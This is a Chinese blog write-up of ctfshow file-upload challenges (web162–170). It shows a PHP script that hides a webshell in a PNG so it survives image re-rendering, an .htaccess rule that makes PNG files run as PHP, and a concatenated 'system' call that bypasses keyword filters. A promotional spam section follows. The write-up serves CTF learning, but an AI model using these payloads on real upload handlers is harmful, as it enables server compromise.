ctfshow web162-170_ctfshow162题(1),2024年最新2024网络安全春招面试经历

最新推荐文章于 2024-07-09 14:59:30 发布
最新推荐文章于 2024-07-09 14:59:30 发布
阅读量832 收藏 10
点赞数 7
分类专栏: 2024年程序员学习 文章标签: web安全 面试 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84164503/article/details/137557534
版权

这就给了我们一种思路:我们把原来的图片和二次渲染后的图片进行对比,找到不改变的地方,把我们的后门代码植入到这个地方中,再进行上传。

参考文件上传之二次渲染绕过_二次渲染绕过怎么操作-CSDN博客贴脚本:

<?php $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33); $img = imagecreatetruecolor(32, 32); for ($y = 0; $y < sizeof($p); $y += 3) { $r = $p[$y]; $g = $p[$y+1]; $b = $p[$y+2]; $color = imagecolorallocate($img, $r, $g, $b); imagesetpixel($img, round($y / 3), 0, $color); } imagepng($img,'./1.png'); ?>

这脚本生成的后门是用get方式传递system post传递命令

运行脚本,生成了一个png,上传成功。

注意:这里图片的地址是用php代码包含的。所以才可以执行php代码。如果不是这样,而是直接用路径显示,我们就需要使用.user.ini文件。

web165(jpg二次渲染)

这题js要求上传jpg图片,随便上传一个jpg

也是包含地址。

文件二次渲染:1.判断上传前和上传后的文件大小及内容。

2.判断上传后的文件返回数据包

前后对比:

我们将下载下来的图片加入后门代码然后在上传

然后方法同上一题。

web166

发现是要上传zip文件

上传一个php后门的zip,上传成功。

发现他是包含格式的

蚁剑直接连即可

web167(.htaccess)

httpd

需要上传jpg格式的图片

htaccess默认不支持nginx,设置后支持

htaccess可以通过设置实现文件解析配置将png后缀的文件解析成php

AddType application/x-httpd-php png

将png后缀的文件解析成php

如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess

虽然htaccess默认不支持,但是可以设为支持。

web168(木马变换)

发现eval,system,$_POST都被过滤了

可以用变量替换的形式来绕过:

<?php $a='syste'.'m';$a("cat ../f\*");?>

访问即可

web169(.user.ini条件利用)

构造.user.ini的条件:1.当前目录要有一个只向index.php文件,这个文件的内容是随意的。

2.要求php版本为7版本

这种情况下就没有指向文件。所以我们要上传一个index.php文件。

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

在这里插入图片描述

因篇幅有限,仅展示部分资料

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-VAzBusO0-1712651189203)]

2401_84164503
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 文件上传 web162
Kradress的博客
02-15 2090
目录思路总结 思路 大致思路和上类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
ctfshow web入门 文件上传web162--web167
2301_81040377的博客
04-09 804
我们上传的文件如果不符合要求,就会被删除,导致成功上传无法访问,没有用。但是如果我们上传的速度比服务器删的速度快,就可以了。#### 本总结可能你们并不觉得这道难但是这道确实难到我了,我做了很久总结一下可能错误的点。一样的操作,如上,如果代码跑不出来,要么忘记改要么就是没有放包。然后进入下载页面的时候抓包(“下载文件的时候抓包”)压缩文件太大或者太小导致上传不成功或者很难去。,你们可以自己修改,把脚本的也改了就是。访问上传的文件,进行命令执行。只能上传压缩文件,我们就在。里面添加一句话木马就行了。
2024ctfshow web162-170_ctfshow162(1),网络安全模块化面向接口编程
2401_84239625的博客
05-12 371
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。二次渲染:在我们上传文件后,网站会对图片进行二次处理(格式、尺寸要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片并放到网站对应的标签进行显示。这就给了我们一种思路:我们把原来的图片和二次渲染后的图片进行对比,找到不改变的地方,把我们的后门代码植入到这个地方中,再进行上传。
ctfshow(web入门)
qq_62553635的博客
01-15 1629
第三 根据提示直接bp抓包 发送到repeater查看响应包 得flag
ctfshow web162-170
m0_74057302的博客
03-13 2113
往事暗沉不可追,来日之路光明灿烂
CTFshow刷日记-WEB-文件上传
Love&Share
09-08 1468
web151-前端绕过 简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过 这次不改前端了,直接在bp改,将Content-Type改成 image/png 总结下常见conten-type类型 常见的媒体格式类型如下: text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 im
2024春招面试-鑫合易家java初级试卷1-目.docx
04-14
#### 1. Final关键字与不可变性 - **知识点解释**:`final`关键字用于声明不可变的变量或方法。一旦为`final`变量分配了初始值,就不能再更改。例如,在目中提到的`final StringBuffer s = new StringBuffer("xhyj...
2024秋招and春招-中威面试.pdf
04-14
根据给定的信息,本文将详细解析“2024秋招and春招—中威面试”中涉及的关键IT知识点,主要包括Java框架的核心概念、Spring框架中的两大核心思想(IOC与AOP)、SpringMVC的工作流程、以及一些常见的编程问。...
2024秋招and春招-悦能智能科技面试.txt
04-14
2024秋招and春招——悦能智能科技面试.txt2024秋招and春招——悦能智能科技面试.txt2024秋招and春招——悦能智能科技面试.txt2024秋招and春招——悦能智能科技面试.txt2024秋招and春招——悦能智能科技面试...
2024秋招and春招-面试基础(1).docx
04-14
### 1. Java基础 #### Static的作用 - **修饰函数的局部变量**:当static用于函数内部时,它修饰的变量称为静态局部变量。这类变量具有以下特性: - 默认值为0。 - 在程序运行时仅初始化一次,之后即使函数多次被...
leetcode下载-campus_recruitmen_questions:2021最新整理,5000道秋招/提前批/春招/常用面试,包
06-29
2021最新整理,5000道校招常用面试,包含leetcode,校招笔试面试,算法,语法。(2021/06/28开始)每天持续更新中。。。 ACM 2.整数的划分 3.DP+四边形不等式优化(hdu 3506 Monkey Party) 4.快餐...
ctfshow-web入门-文件上传(web161、web162web163)远程包含
最新发布
Welcome To Myon'Blog !
07-09 1232
后面又去 b 站看了下视频,发现它远程包含的就是一个 php 文件,而我这里包含的 shell 是一个纯文本的东西,我最开始以为是将这段内容包含进了 index.php 的代码里,所以就没有考虑它不是 php 后缀是否可以正常解析的问。后面问了群里的师傅,说用 flask,我原本用的是 Apache 搭的服务,重置了服务器,Apache 和 php 其实都是刚下的,可能还需要配置点什么吧,不清楚,因此我们将木马放到 flask 服务上去。那么我们上传的文件名就不使用后缀即可:这里以 test 为例。
CTFshow——web入门——文件上传
h_adam的博客
02-17 4998
web151 前端校验 修改上传格式为php,上传一句话马,蚁剑连接得flag web152 后端校验 上传一句话,png文件抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。 web153 打开发现/upload下存在index.php文件,我们可以利用.user.ini,可参阅.htaccess 和.user.ini 配置文件妙用 php手册—关于php.ini配置项 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png
CTFShow Web入门_爆破
qq_19533763的博客
04-01 1104
Web21 随便输入抓包 发现Base64加密 账号和密码用:隔开 使用BP构造payload爆破 下载官方提供的字典 把后缀名改为.zip即可打开 使用Custom iterator模式 第一部分 第二部分 第三部分使用字典 添加base64加密 关闭url编码 爆破完按length排序查看最小的回包 Web22 子域名爆破,爆破ctf.show 最终在vip.ctf.show的源码发现了flag Web23 error_reporting(0); include('fla
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1093
CTFshow-文件上传
ctfshow 文件上传161-167
qq_52671379的博客
04-08 1785
ctfshow 文件上传161-167
CTFshow——文件上传
D.MIND 的博客
02-23 1303
目录:web151、152——前后端的简单检验web153——.user.ini配置文件web154、155——PHP的其他标记写法web156——{ }代替[ ]web157、158、159——web160—— web151、152——前后端的简单检验 发现只能上传PNG文件,上传一个图片马,用Burp抓包修改文件后缀  1.在upload/xx.php页面结合一句话木马  2.用蚁剑、菜刀连接 web153——.user.ini配置文件 细看:.htaccess和.user.ini配置文件妙用 如
CTFshow 文件上传 web161
Kradress的博客
02-15 404
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 在上传.user.ini发现失败,可能对文件内容进行检测 在多次尝试后,发现文件类型为image/png,文件头加上GIF89a而且文件不能太小,要多加点内容 其他都和上一样 .user.ini GIF89a auto_prepend_file=shell.png shell.png 记得url解码 GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值